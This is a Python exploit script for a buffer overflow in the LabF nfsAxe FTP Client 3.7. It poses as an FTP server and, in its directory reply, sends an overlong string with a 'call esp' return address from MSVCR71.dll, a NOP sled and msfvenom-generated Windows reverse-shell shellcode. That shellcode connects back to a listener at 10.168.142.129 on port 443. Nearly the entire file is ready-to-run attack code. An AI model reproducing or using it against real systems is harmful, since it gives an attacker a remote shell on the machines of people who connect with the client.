#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/04/27 16:59:13 dhn Exp $

import sys
import socket
import argparse

class Exploit:
    def __init__(self, server, port, payload):
        self._payload = payload
        self._server = server
        self._port = port

    def __listen(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((self._server, self._port))
        s.listen(5)
        return s.accept()


    def run(self):
        while True:
            try:
                conn, addr = self.__listen()
                conn.send("220 Welcome!\r\n")
                conn.recv(1024)
                conn.send("331 OK.\r\n")
                conn.recv(1024)
                conn.send("230 OK.\r\n")
                conn.recv(1024)
                conn.send("220 " + self._payload + " is current directory\r\n")
                conn.recv(1024)
                conn.send("257\r\n")
            except socket.error:
                print("[+] Done")
                sys.exit(0)

def main(args):
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.168.142.129 \
    #       LPORT=443 -f python -b '\x00\x0a\x0d' EXITFUNC=thread
    buf =  ""
    buf += "\xbf\x47\xfe\xdc\x99\xd9\xc0\xd9\x74\x24\xf4\x5a\x29"
    buf += "\xc9\xb1\x52\x83\xea\xfc\x31\x7a\x0e\x03\x3d\xf0\x3e"
    buf += "\x6c\x3d\xe4\x3d\x8f\xbd\xf5\x21\x19\x58\xc4\x61\x7d"
    buf += "\x29\x77\x52\xf5\x7f\x74\x19\x5b\x6b\x0f\x6f\x74\x9c"
    buf += "\xb8\xda\xa2\x93\x39\x76\x96\xb2\xb9\x85\xcb\x14\x83"
    buf += "\x45\x1e\x55\xc4\xb8\xd3\x07\x9d\xb7\x46\xb7\xaa\x82"
    buf += "\x5a\x3c\xe0\x03\xdb\xa1\xb1\x22\xca\x74\xc9\x7c\xcc"
    buf += "\x77\x1e\xf5\x45\x6f\x43\x30\x1f\x04\xb7\xce\x9e\xcc"
    buf += "\x89\x2f\x0c\x31\x26\xc2\x4c\x76\x81\x3d\x3b\x8e\xf1"
    buf += "\xc0\x3c\x55\x8b\x1e\xc8\x4d\x2b\xd4\x6a\xa9\xcd\x39"
    buf += "\xec\x3a\xc1\xf6\x7a\x64\xc6\x09\xae\x1f\xf2\x82\x51"
    buf += "\xcf\x72\xd0\x75\xcb\xdf\x82\x14\x4a\xba\x65\x28\x8c"
    buf += "\x65\xd9\x8c\xc7\x88\x0e\xbd\x8a\xc4\xe3\x8c\x34\x15"
    buf += "\x6c\x86\x47\x27\x33\x3c\xcf\x0b\xbc\x9a\x08\x6b\x97"
    buf += "\x5b\x86\x92\x18\x9c\x8f\x50\x4c\xcc\xa7\x71\xed\x87"
    buf += "\x37\x7d\x38\x07\x67\xd1\x93\xe8\xd7\x91\x43\x81\x3d"
    buf += "\x1e\xbb\xb1\x3e\xf4\xd4\x58\xc5\x9f\xd0\x34\x4b\xde"
    buf += "\x8d\x46\x53\xe0\xf6\xce\xb5\x88\x18\x87\x6e\x25\x80"
    buf += "\x82\xe4\xd4\x4d\x19\x81\xd7\xc6\xae\x76\x99\x2e\xda"
    buf += "\x64\x4e\xdf\x91\xd6\xd9\xe0\x0f\x7e\x85\x73\xd4\x7e"
    buf += "\xc0\x6f\x43\x29\x85\x5e\x9a\xbf\x3b\xf8\x34\xdd\xc1"
    buf += "\x9c\x7f\x65\x1e\x5d\x81\x64\xd3\xd9\xa5\x76\x2d\xe1"
    buf += "\xe1\x22\xe1\xb4\xbf\x9c\x47\x6f\x0e\x76\x1e\xdc\xd8"
    buf += "\x1e\xe7\x2e\xdb\x58\xe8\x7a\xad\x84\x59\xd3\xe8\xbb"
    buf += "\x56\xb3\xfc\xc4\x8a\x23\x02\x1f\x0f\x43\xe1\xb5\x7a"
    buf += "\xec\xbc\x5c\xc7\x71\x3f\x8b\x04\x8c\xbc\x39\xf5\x6b"
    buf += "\xdc\x48\xf0\x30\x5a\xa1\x88\x29\x0f\xc5\x3f\x49\x1a"

    call_esp = "\x7c\x34\x5c\x30"[::-1] # in MSVCR71.dll

    payload = "A" * 2064
    payload += call_esp
    payload += "\x90" * (5000 - 2064) + buf

    exploit = Exploit(args.host, int(args.port), payload)
    print("[+] LabF nfsAxe FTP Client 3.7; exploit by dhn")
    print("[+] Listen on %s:%s" % (args.host, args.port))

    if exploit.run():
        print("[!] Fail")
    else:
        print("[+] Done")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--host', required=True)
    parser.add_argument('--port', required=True)
    args = parser.parse_args()

    main(args)
